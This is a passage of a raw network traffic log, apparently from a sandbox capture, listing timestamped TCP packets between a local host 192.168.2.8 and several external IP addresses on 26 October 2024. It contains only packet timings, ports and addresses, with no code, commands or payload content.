                                                                                                                                                                                                    Oct 26, 2024 07:27:12.736727953 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:12.736867905 CEST5429980192.168.2.8185.215.113.84
                                                                                                                                                                                                    Oct 26, 2024 07:27:12.773663044 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:12.773680925 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:12.773696899 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:12.773804903 CEST5429980192.168.2.8185.215.113.84
                                                                                                                                                                                                    Oct 26, 2024 07:27:12.820555925 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:12.820646048 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:12.820662975 CEST5429980192.168.2.8185.215.113.84
                                                                                                                                                                                                    Oct 26, 2024 07:27:12.820692062 CEST5429980192.168.2.8185.215.113.84
                                                                                                                                                                                                    Oct 26, 2024 07:27:12.847906113 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:12.847913980 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:12.847927094 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:12.848004103 CEST5429980192.168.2.8185.215.113.84
                                                                                                                                                                                                    Oct 26, 2024 07:27:12.848058939 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:12.848066092 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:12.848076105 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:12.848121881 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:12.848129034 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:12.848186970 CEST5429980192.168.2.8185.215.113.84
                                                                                                                                                                                                    Oct 26, 2024 07:27:12.848186970 CEST5429980192.168.2.8185.215.113.84
                                                                                                                                                                                                    Oct 26, 2024 07:27:12.848887920 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:12.848895073 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:12.848906994 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:12.848912954 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:12.848918915 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:12.848936081 CEST5429980192.168.2.8185.215.113.84
                                                                                                                                                                                                    Oct 26, 2024 07:27:12.848936081 CEST5429980192.168.2.8185.215.113.84
                                                                                                                                                                                                    Oct 26, 2024 07:27:12.848969936 CEST5429980192.168.2.8185.215.113.84
                                                                                                                                                                                                    Oct 26, 2024 07:27:12.889472961 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:12.889482975 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:12.889493942 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:12.889559984 CEST5429980192.168.2.8185.215.113.84
                                                                                                                                                                                                    Oct 26, 2024 07:27:12.965111017 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:12.965130091 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:12.965142012 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:12.965148926 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:12.965156078 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:12.965210915 CEST5429980192.168.2.8185.215.113.84
                                                                                                                                                                                                    Oct 26, 2024 07:27:12.965418100 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:12.965432882 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:12.965441942 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:12.965477943 CEST5429980192.168.2.8185.215.113.84
                                                                                                                                                                                                    Oct 26, 2024 07:27:12.965477943 CEST5429980192.168.2.8185.215.113.84
                                                                                                                                                                                                    Oct 26, 2024 07:27:12.965533972 CEST5429980192.168.2.8185.215.113.84
                                                                                                                                                                                                    Oct 26, 2024 07:27:12.965770006 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:12.965787888 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:12.965795040 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:12.965842962 CEST5429980192.168.2.8185.215.113.84
                                                                                                                                                                                                    Oct 26, 2024 07:27:12.965842962 CEST5429980192.168.2.8185.215.113.84
                                                                                                                                                                                                    Oct 26, 2024 07:27:12.965878010 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:12.965884924 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:12.965992928 CEST5429980192.168.2.8185.215.113.84
                                                                                                                                                                                                    Oct 26, 2024 07:27:12.966645002 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:12.966653109 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:12.966664076 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:12.966716051 CEST5429980192.168.2.8185.215.113.84
                                                                                                                                                                                                    Oct 26, 2024 07:27:13.006484032 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:13.006496906 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:13.006510973 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:13.006516933 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:13.006583929 CEST5429980192.168.2.8185.215.113.84
                                                                                                                                                                                                    Oct 26, 2024 07:27:13.006614923 CEST5429980192.168.2.8185.215.113.84
                                                                                                                                                                                                    Oct 26, 2024 07:27:13.052704096 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:13.052711964 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:13.052782059 CEST5429980192.168.2.8185.215.113.84
                                                                                                                                                                                                    Oct 26, 2024 07:27:13.082128048 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:13.082134962 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:13.082142115 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:13.082220078 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:13.082226992 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:13.082250118 CEST5429980192.168.2.8185.215.113.84
                                                                                                                                                                                                    Oct 26, 2024 07:27:13.082285881 CEST5429980192.168.2.8185.215.113.84
                                                                                                                                                                                                    Oct 26, 2024 07:27:13.082426071 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:13.082513094 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:13.082520008 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:13.082540035 CEST5429980192.168.2.8185.215.113.84
                                                                                                                                                                                                    Oct 26, 2024 07:27:13.082557917 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:13.082617044 CEST5429980192.168.2.8185.215.113.84
                                                                                                                                                                                                    Oct 26, 2024 07:27:13.082647085 CEST5429980192.168.2.8185.215.113.84
                                                                                                                                                                                                    Oct 26, 2024 07:27:13.083002090 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:13.083039999 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:13.083045959 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:13.083053112 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:13.083086967 CEST5429980192.168.2.8185.215.113.84
                                                                                                                                                                                                    Oct 26, 2024 07:27:13.083086967 CEST5429980192.168.2.8185.215.113.84
                                                                                                                                                                                                    Oct 26, 2024 07:27:13.083110094 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:13.083117962 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:13.083188057 CEST5429980192.168.2.8185.215.113.84
                                                                                                                                                                                                    Oct 26, 2024 07:27:13.123635054 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:13.123671055 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:13.123711109 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:13.123730898 CEST5429980192.168.2.8185.215.113.84
                                                                                                                                                                                                    Oct 26, 2024 07:27:13.123730898 CEST5429980192.168.2.8185.215.113.84
                                                                                                                                                                                                    Oct 26, 2024 07:27:13.123754978 CEST5429980192.168.2.8185.215.113.84
                                                                                                                                                                                                    Oct 26, 2024 07:27:13.123758078 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:13.123856068 CEST5429980192.168.2.8185.215.113.84
                                                                                                                                                                                                    Oct 26, 2024 07:27:13.177377939 CEST5430080192.168.2.8185.215.113.66
                                                                                                                                                                                                    Oct 26, 2024 07:27:13.182835102 CEST8054300185.215.113.66192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:13.182921886 CEST5430080192.168.2.8185.215.113.66
                                                                                                                                                                                                    Oct 26, 2024 07:27:13.183058977 CEST5430080192.168.2.8185.215.113.66
                                                                                                                                                                                                    Oct 26, 2024 07:27:13.188818932 CEST8054300185.215.113.66192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:13.199274063 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:13.199280977 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:13.199297905 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:13.199304104 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:13.199310064 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:13.199322939 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:13.199357986 CEST5429980192.168.2.8185.215.113.84
                                                                                                                                                                                                    Oct 26, 2024 07:27:13.199388027 CEST5429980192.168.2.8185.215.113.84
                                                                                                                                                                                                    Oct 26, 2024 07:27:13.199721098 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:13.199727058 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:13.199738026 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:13.199815035 CEST5429980192.168.2.8185.215.113.84
                                                                                                                                                                                                    Oct 26, 2024 07:27:13.200062037 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:13.200067997 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:13.200079918 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:13.200094938 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:13.200107098 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:13.200113058 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:13.200134039 CEST5429980192.168.2.8185.215.113.84
                                                                                                                                                                                                    Oct 26, 2024 07:27:13.200134039 CEST5429980192.168.2.8185.215.113.84
                                                                                                                                                                                                    Oct 26, 2024 07:27:13.200160027 CEST5429980192.168.2.8185.215.113.84
                                                                                                                                                                                                    Oct 26, 2024 07:27:13.200963974 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:13.200975895 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:13.200987101 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:13.201083899 CEST5429980192.168.2.8185.215.113.84
                                                                                                                                                                                                    Oct 26, 2024 07:27:13.240926027 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:13.240935087 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:13.240946054 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:13.241081953 CEST5429980192.168.2.8185.215.113.84
                                                                                                                                                                                                    Oct 26, 2024 07:27:13.316401958 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:13.316450119 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:13.316457033 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:13.316468000 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:13.316721916 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:13.316732883 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:13.316745043 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:13.316781044 CEST5429980192.168.2.8185.215.113.84
                                                                                                                                                                                                    Oct 26, 2024 07:27:13.316807032 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:13.316809893 CEST5429980192.168.2.8185.215.113.84
                                                                                                                                                                                                    Oct 26, 2024 07:27:13.316813946 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:13.316864967 CEST5429980192.168.2.8185.215.113.84
                                                                                                                                                                                                    Oct 26, 2024 07:27:13.317045927 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:13.317053080 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:13.317090034 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:13.317096949 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:13.317100048 CEST5429980192.168.2.8185.215.113.84
                                                                                                                                                                                                    Oct 26, 2024 07:27:13.317143917 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:13.317147970 CEST5429980192.168.2.8185.215.113.84
                                                                                                                                                                                                    Oct 26, 2024 07:27:13.317151070 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:13.317163944 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:13.317229986 CEST5429980192.168.2.8185.215.113.84
                                                                                                                                                                                                    Oct 26, 2024 07:27:13.317229986 CEST5429980192.168.2.8185.215.113.84
                                                                                                                                                                                                    Oct 26, 2024 07:27:13.318032026 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:13.318141937 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:13.318147898 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:13.318162918 CEST5429980192.168.2.8185.215.113.84
                                                                                                                                                                                                    Oct 26, 2024 07:27:13.318195105 CEST5429980192.168.2.8185.215.113.84
                                                                                                                                                                                                    Oct 26, 2024 07:27:13.358115911 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:13.358124018 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:13.358136892 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:13.358143091 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:13.358226061 CEST5429980192.168.2.8185.215.113.84
                                                                                                                                                                                                    Oct 26, 2024 07:27:13.379342079 CEST5429540500192.168.2.85.76.120.41
                                                                                                                                                                                                    Oct 26, 2024 07:27:13.384982109 CEST40500542955.76.120.41192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:13.433514118 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:13.433526039 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:13.433538914 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:13.433643103 CEST5429980192.168.2.8185.215.113.84
                                                                                                                                                                                                    Oct 26, 2024 07:27:13.433660984 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:13.433680058 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:13.433686018 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:13.433707952 CEST5429980192.168.2.8185.215.113.84
                                                                                                                                                                                                    Oct 26, 2024 07:27:13.433739901 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:13.433747053 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:13.433764935 CEST5429980192.168.2.8185.215.113.84
                                                                                                                                                                                                    Oct 26, 2024 07:27:13.433808088 CEST5429980192.168.2.8185.215.113.84
                                                                                                                                                                                                    Oct 26, 2024 07:27:13.434268951 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:13.434273958 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:13.434343100 CEST5429980192.168.2.8185.215.113.84
                                                                                                                                                                                                    Oct 26, 2024 07:27:13.434381008 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:13.434386969 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:13.434393883 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:13.434436083 CEST5429980192.168.2.8185.215.113.84
                                                                                                                                                                                                    Oct 26, 2024 07:27:13.434453964 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:13.434545040 CEST5429980192.168.2.8185.215.113.84
                                                                                                                                                                                                    Oct 26, 2024 07:27:13.434845924 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:13.434851885 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:13.434864044 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:13.434900999 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:13.434912920 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:13.434962988 CEST5429980192.168.2.8185.215.113.84
                                                                                                                                                                                                    Oct 26, 2024 07:27:13.434962988 CEST5429980192.168.2.8185.215.113.84
                                                                                                                                                                                                    Oct 26, 2024 07:27:13.475140095 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:13.475150108 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:13.475156069 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:13.475225925 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:13.475231886 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:13.475246906 CEST5429980192.168.2.8185.215.113.84
                                                                                                                                                                                                    Oct 26, 2024 07:27:13.475294113 CEST5429980192.168.2.8185.215.113.84
                                                                                                                                                                                                    Oct 26, 2024 07:27:13.550652027 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:13.550780058 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:13.550786972 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:13.550791979 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:13.550846100 CEST5429980192.168.2.8185.215.113.84
                                                                                                                                                                                                    Oct 26, 2024 07:27:13.550846100 CEST5429980192.168.2.8185.215.113.84
                                                                                                                                                                                                    Oct 26, 2024 07:27:13.550879955 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:13.550887108 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:13.550899029 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:13.550909996 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:13.550945044 CEST5429980192.168.2.8185.215.113.84
                                                                                                                                                                                                    Oct 26, 2024 07:27:13.550945044 CEST5429980192.168.2.8185.215.113.84
                                                                                                                                                                                                    Oct 26, 2024 07:27:13.551337957 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:13.551343918 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:13.551387072 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:13.551393986 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:13.551403046 CEST5429980192.168.2.8185.215.113.84
                                                                                                                                                                                                    Oct 26, 2024 07:27:13.551430941 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:13.551431894 CEST5429980192.168.2.8185.215.113.84
                                                                                                                                                                                                    Oct 26, 2024 07:27:13.551436901 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:13.551450014 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:13.551457882 CEST5429980192.168.2.8185.215.113.84
                                                                                                                                                                                                    Oct 26, 2024 07:27:13.551484108 CEST5429980192.168.2.8185.215.113.84
                                                                                                                                                                                                    Oct 26, 2024 07:27:13.551527023 CEST5429980192.168.2.8185.215.113.84
                                                                                                                                                                                                    Oct 26, 2024 07:27:13.552232981 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:13.552239895 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:13.552249908 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:13.552288055 CEST5429980192.168.2.8185.215.113.84
                                                                                                                                                                                                    Oct 26, 2024 07:27:13.552318096 CEST5429980192.168.2.8185.215.113.84
                                                                                                                                                                                                    Oct 26, 2024 07:27:13.592319965 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:13.592328072 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:13.592339993 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:13.592398882 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:13.592411041 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:13.592462063 CEST5429980192.168.2.8185.215.113.84
                                                                                                                                                                                                    Oct 26, 2024 07:27:13.592462063 CEST5429980192.168.2.8185.215.113.84
                                                                                                                                                                                                    Oct 26, 2024 07:27:13.592533112 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:13.592539072 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:13.592637062 CEST5429980192.168.2.8185.215.113.84
                                                                                                                                                                                                    Oct 26, 2024 07:27:13.667726994 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:13.667783976 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:13.667789936 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:13.667835951 CEST5429980192.168.2.8185.215.113.84
                                                                                                                                                                                                    Oct 26, 2024 07:27:13.667835951 CEST5429980192.168.2.8185.215.113.84
                                                                                                                                                                                                    Oct 26, 2024 07:27:13.667850971 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:13.667872906 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:13.667906046 CEST5429980192.168.2.8185.215.113.84
                                                                                                                                                                                                    Oct 26, 2024 07:27:13.667911053 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:13.667984009 CEST5429980192.168.2.8185.215.113.84
                                                                                                                                                                                                    Oct 26, 2024 07:27:13.668165922 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:13.668173075 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:13.668184996 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:13.668271065 CEST5429980192.168.2.8185.215.113.84
                                                                                                                                                                                                    Oct 26, 2024 07:27:13.668271065 CEST5429980192.168.2.8185.215.113.84
                                                                                                                                                                                                    Oct 26, 2024 07:27:13.668271065 CEST5429980192.168.2.8185.215.113.84
                                                                                                                                                                                                    Oct 26, 2024 07:27:13.668467999 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:13.668528080 CEST5429980192.168.2.8185.215.113.84
                                                                                                                                                                                                    Oct 26, 2024 07:27:13.668530941 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:13.668536901 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:13.668544054 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:13.668576956 CEST5429980192.168.2.8185.215.113.84
                                                                                                                                                                                                    Oct 26, 2024 07:27:13.668607950 CEST5429980192.168.2.8185.215.113.84
                                                                                                                                                                                                    Oct 26, 2024 07:27:13.668901920 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:13.668941975 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:13.668947935 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:13.668967009 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:13.668968916 CEST5429980192.168.2.8185.215.113.84
                                                                                                                                                                                                    Oct 26, 2024 07:27:13.668973923 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:13.668984890 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:13.669012070 CEST5429980192.168.2.8185.215.113.84
                                                                                                                                                                                                    Oct 26, 2024 07:27:13.669012070 CEST5429980192.168.2.8185.215.113.84
                                                                                                                                                                                                    Oct 26, 2024 07:27:13.669025898 CEST5429980192.168.2.8185.215.113.84
                                                                                                                                                                                                    Oct 26, 2024 07:27:13.709610939 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:13.709619045 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:13.709631920 CEST8054299185.215.113.84192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:13.709636927 CEST8054299185.215.113.84192.168.2.8
